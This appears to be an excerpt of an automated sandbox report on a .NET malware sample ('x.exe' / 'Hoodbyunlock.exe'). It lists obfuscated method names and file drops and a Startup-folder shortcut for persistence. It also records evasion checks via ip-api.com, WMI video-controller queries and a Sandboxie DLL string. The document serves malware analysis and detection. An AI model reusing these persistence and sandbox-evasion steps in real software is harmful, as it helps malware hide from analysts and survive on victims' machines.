                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, GVhN53QgxWl6tpiCd.cs - High entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.cs - High entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, dVvs1XNmsaLNa04pa.cs - High entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, UAKhR7NJbD3KWn0Nd.cs - High entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, ktUwZuVPUn1uLnrpF.cs - High entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, bRv5O3fSB18gLSRt9.cs - High entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs - High entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, GXHRyrck0HnRoIRVg.cs - High entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, 8oKYND99avZqdoU5T.cs - High entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, y9w99ZmeIXuttmqO5.cs - High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: Hoodbyunlock.exe.7.dr, ZdLTnuqgOY3k2FQWh.cs - High entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: Hoodbyunlock.exe.7.dr, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.cs - High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: Hoodbyunlock.exe.7.dr, GVhN53QgxWl6tpiCd.cs - High entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: Hoodbyunlock.exe.7.dr, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.cs - High entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: Hoodbyunlock.exe.7.dr, dVvs1XNmsaLNa04pa.cs - High entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: Hoodbyunlock.exe.7.dr, UAKhR7NJbD3KWn0Nd.cs - High entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: Hoodbyunlock.exe.7.dr, ktUwZuVPUn1uLnrpF.cs - High entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: Hoodbyunlock.exe.7.dr, bRv5O3fSB18gLSRt9.cs - High entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: Hoodbyunlock.exe.7.dr, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs - High entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: Hoodbyunlock.exe.7.dr, GXHRyrck0HnRoIRVg.cs - High entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: Hoodbyunlock.exe.7.dr, 8oKYND99avZqdoU5T.cs - High entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: Hoodbyunlock.exe.7.dr, y9w99ZmeIXuttmqO5.cs - High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, ZdLTnuqgOY3k2FQWh.cs - High entropy of concatenated method names: 'QN1t9tXhLhv98EXG7', 'X2y7W9fadgS4DyzNa', 'rK1gTQvr57y1qvnmT', 'LkJsXVRufF1n3PJ76lQAfBskMFNm6LJadKJ1zMIMvqtXkmfgN8GGhgkV2wx7ufqcWRR', 'DWRBoOvnp5ZOvNWvTay4uj94xbk1oDZRBZG7727S2NIL2AEJHJpuwYnGdjWyKfm4Cxo', '_6Cr4EeyxsmAuQpTyEMOMMmtzk4y7c5Pdv3TCzx6AO6yb91EutxpUtaRJZvGthQYiefE', '_7KlSkePwTyZRIZ7PaYrBOI5CMKlMVkfem7GTv8dDwKW8ctC2cMd5sjZqKPSzjKdXfDV', '_1DsqMjnSaA94ZFTw5SBCfVNeAlQrz4KUbcMgXjprzn3KoxHvZ8zEt5bx2O6ofYajP1o', 'IMEai2g1ONuNsx6nnS9sh9H21ljAQJd4wYOCM8Q6sSRL8pMMhrrgGgiSqVyGxJ8qYDn', 'ECraczxHUSC3tua1ouB2OJXo70Rs4XTHxKCKkLtFMOzYb9EH7gPa1PxtSVCNIlWP1Mk'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 8Jaf9UAvzEGq55typT6Pkhartwa1iUVp.cs - High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'gRmA0Fs4Fj8m2cxWH', 'Ql4cwKZRPDBaZnipS', 'O8f8MK31AfQEJkAv2', 'APdUl99vAUyyXAAFu'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, GVhN53QgxWl6tpiCd.cs - High entropy of concatenated method names: 'RegexResult', 'WndProc', 'A6Uhc606QwQ0Zm0HK4Ozk9B8xlClcf2XfewKRB3wrkM5rVhhGkQQQm7gBYl5BTS8oYUncI29SP8SGjvRLM', 'Y5HcfhXIhGhXVEcVey7z4Lc342CyAMYjaPJYZnn3oqkEmcQSrVU4Q3B88ViFqwuWAqZvRSgbsjFYarIH1p'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, hxJwBk8Rp0X6e7PsRDJpGmVPrHx4gBMq.cs - High entropy of concatenated method names: 'M6Pjt09GsWfanRtalnXtJmRxwU16H1g4', 'e6uulpEWxKtDSm0IjZ09pto4x9dIvT0w', '_7WTE8oFH4vwm4x5y202KWqe0ysgpdDu7', 'kbHWNnZ0VwNXYUtCFgAPENDrHTYQAuNH', 'XDg1kNFyH7AXOgoWsq5365MC30QxDnDx', '_4sSTo4uCL8fSjnwfgDoAfdpLQjPJRXa3', 'gl8iadDaKZylRyk425kdkxJ1MnngITIL', 'hY5kUOHes2aO7a2xNznbkJOnNioRDoGR', '_87Eqs9hvQSfBcuJpAYwQiGDBch4J6oid', '_6rYeKKqczmMMjWoeIiacm1JPn48cqxyI'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, dVvs1XNmsaLNa04pa.cs - High entropy of concatenated method names: '_2paFzAijsDRdnCKoS', 'kQDJ059RzJMZ4crRs', 'LMYT5QeAxwNEAEQyD', 'vuoG9Qw4yj5Ea7Rtk', 'RKcu55oqataXXogwd', 'uk0lLV07kANck3Amt', 'mpku9WcyRNohRTvls', 'PKbSuPgiRvoxMmlXu', 'nKRMHesIk5vtTkuKR', 'MpQfw3OoR7IsyK9UY'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, UAKhR7NJbD3KWn0Nd.cs - High entropy of concatenated method names: 'iuxc2Jn7e7nsqLksF', 'OpNm66LKdpnHllqo9', 'Ml9nM3AyoYUue0XRF', 'D0EtLe0PN51VuAfio', 'm3QloB4lgsW9zeGK0', 'pjueMtEmIpYwcD5V1', 'fALBbecRaEfyZw3tB', '_79CkwlVc3CtOCWoBe', 'tb0sOrxbVf181Ira8', 'HD37clOuJb4gwNcKh'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, ktUwZuVPUn1uLnrpF.cs - High entropy of concatenated method names: 'r5ehq0TQjJBz68rR8', 'QnSBBigt3JbpBIcqY9y2vHZ6sgLzWr9ojuMViGfVWBcyUGpOXlmsPmCjP8fIOAcxFgoQL0YdxnI9yqghks', 'VSFnEbXioI2mKeCHHSkNIy3YfOVmwaPF3V6OuntSu885YZTE2FgKeEYvWoFahotlJnFKSYqFQMhOaTie15', 'k7zNPAHAbolvUoiRjwosNMML6wZoj5vTpZzf6XasIQc969qsYKTDsFIcFvZJGr9LAYX8Ac0F8F62sv52lg', 'HmDpdgze425todh9IXctabQNoP8p4QdKuMVRAB6Zx1XSRQHespvrBzGkgSb4QJluB1ZaU0aXYos3zJYnbc'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, bRv5O3fSB18gLSRt9.cs - High entropy of concatenated method names: 'smksmczVmWBEJfyBP', 'j2w2bSDFvXcjvXugO', '_1wu2TMKAHwLqmgw4rRoINBl0v0Q11LgQIgrshFE8r0jb83sWx2eTS7X0jck48xfJkMkEkRYwFq4ktLkgxR', 'CFCGhrg4ddiKj09LfGQA0WlxfpeTCAaHUSc7ewPfgamIcgkJmHKs6SqcKRC56H25kqi79TPEPYEySRA1L5', 'Qmb01m7kmJdvWvm0K4Y08f8oBwndyX4oIfNRQrX2NgY0phtlCtL7JUqncsw8JnFClRyaIsXmzDKCudztky', 'vYaYQeVg5xsFbsakW741PvOrJOf3sn19cSBhDWDFtCLm9yinHZ3LZBoqTnDER5qpySRWanWjM7WpB6HOYR'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 71HgZZRenc3pCrs5cwSvoic61CqCAuZ8.cs - High entropy of concatenated method names: 'q7pAZzZ3EnDiRJA6CNudmPgpuGbGtzpV', 'CkT357DsXaHLKIXTIhRm4kN0H24oG2FD', 'nJzVTyPvta5afVyiFSidm4GqBFgW7f9g', 'tLIlAAnoafWpdOaoRWhdFg6l4dseJWWx', 'YET2lYIFTsgJpoPEOdBScEDdRgzldShF', 'L6BGSE4pwNi71UDsMK6klIUnSmANhFmw', 'cvzy5SNuRaLgmVERLhgSyzDYVr4LVZd4', 'tVVnHrcxEBkzo1zE6jhNwNnotPTZSzXj', '_8xyl6DFq166NLZUgwWo4mmWQkKl4d9DF', 'rwQZIKpAzdG74MTjcPhc0ME4fzTwgZSX'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, GXHRyrck0HnRoIRVg.cs - High entropy of concatenated method names: 'H3d6de69oR3hKhOMF', 'PhLmFVcQl3QkZyLzU', '_0TAO5Rsvxq9hzGOHj', 'hkoXtS7v1o1Lef3Gg', 'EesGi649DqUXimQnP8LOo13R6JvL2okzjhNemMjvknVdKmJ2GcbBTlVqL129fAMVsxSZRKQbkkgiZk1Kba', 'khPGLbg46ec6YHwaaD1ctwXsCnUDeYzHybkSaqJCcabz9Mvlo11Jw6fZjjMsRZdEfi2GoTDZyJhdr5AwmW', 'ONZCRP2BVNthbERN5mHt6qCJ9YuDq1lz5xR0EOVlZhx2ReKqNzcj2aOk7BR5WtrHttLMYgtp7pPe2RQhMm', '_2MIhGHTjOP3HS1WYi2JRTfTBCKHGj6LKeSylOF679UubLjKh8R6oNH9ZTWu6k4z1NzysQKAxTxDti4bUbm', 'GiCVAfCZlR4DR4eU8Z6NOt9xE25VDaoeytXt9JC1RhbBkKqgeFmcpqJsOkxRAfU6LzqzvwVvR8SmQrJJZl', '_06FgkZyQ6qKa6EBqZ0SRn2aSy9aaZNXsUVIep2s0y0TwrkNqpIv8gjSA6XOeMCsktxOujuNwFm1fOhU4ru'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, 8oKYND99avZqdoU5T.cs - High entropy of concatenated method names: 'KyPhJhKVrFVArWuxw', 'PQ8qqiFBLASb2FLzqrnN46HS69ygJNaOOQlMwXpIWU2SKE5rznDYbOUhiCsPYdMPC0MECV1YQi1qGk5Iup', '_9gAulm5e8maJgutrMhxwthm4lzCqQpF0KCitRHiYwH831dNo1uUC5G39BcsxHM2BsMs4eNNpcCyRY7qHNj', 'zGPfrZccwieTHXHnSP0iLyDL6jwyBkyMFrIgTTfDcciXXAAIfIbGYsZz2X94sSUBvmDf3sdHuKBYAFDK4G', 'EitRvQvAGcep1Bt7DjDI0KwSBiB6169EbtD2qI1CZRsWl63XNC2qUBExz0H0ivtM2gNfRY1lfOS4nRdBiV'
                      Source: 7.2.x.exe.128a1a78.1.raw.unpack, y9w99ZmeIXuttmqO5.cs - High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_3kuUQ6D859FcECMAW', 'QgYdRiaf38MhnznUlpxjDWzd0koDOaVwqOdFYGDNGzFn6bjwp3UpijxM4zpWvMK4SY4cXjhrkdVAe2nPyt', '_3eiiVv8u9xN1WSgJWAhnNWNQMnJOxABF1zg3Jg6XnQge2tfZsyyIn3fFtIv5SLvPsTUO9uTJdpRUGhoY9F', 'qWiINr7fQVvakV8gHNZYqLqeFMYaLXEJxSTrr5Q9K8IdwsVVeqg0HRQEAxelT7DsaglEB18iPwEYo80mIK', 'k0sfNA0h1lQs4gZEiXmJUJXzf7KegJ64WqDZSlWizXHsLr3tBUg8xN3RhdyryYJu9ejcFXQo1RrQGE0Aoi'

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\cmd.exe - File created: C:\Users\user\AppData\Local\Temp\x.vbs
                      Source: C:\Users\user\AppData\Local\Temp\x.exe - File created: C:\ProgramData\Hoodbyunlock.exe
                      Source: C:\Windows\System32\cscript.exe - File created: C:\Users\user\AppData\Local\Temp\x.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exe - File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hoodbyunlock.lnk
                      Source: C:\Users\user\Desktop\x.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cscript.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\x.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

Source: global traffic :: HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\x.exe :: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (4 times)
Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: SBIEDLL.DLL
Source: cscript.exe, 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Hoodbyunlock.exe.7.dr, x.exe.6.dr :: Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\x.exe :: Memory allocated: 2E90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\x.exe :: Memory allocated: 1B070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 1A890000 memory reserve | memory write watch
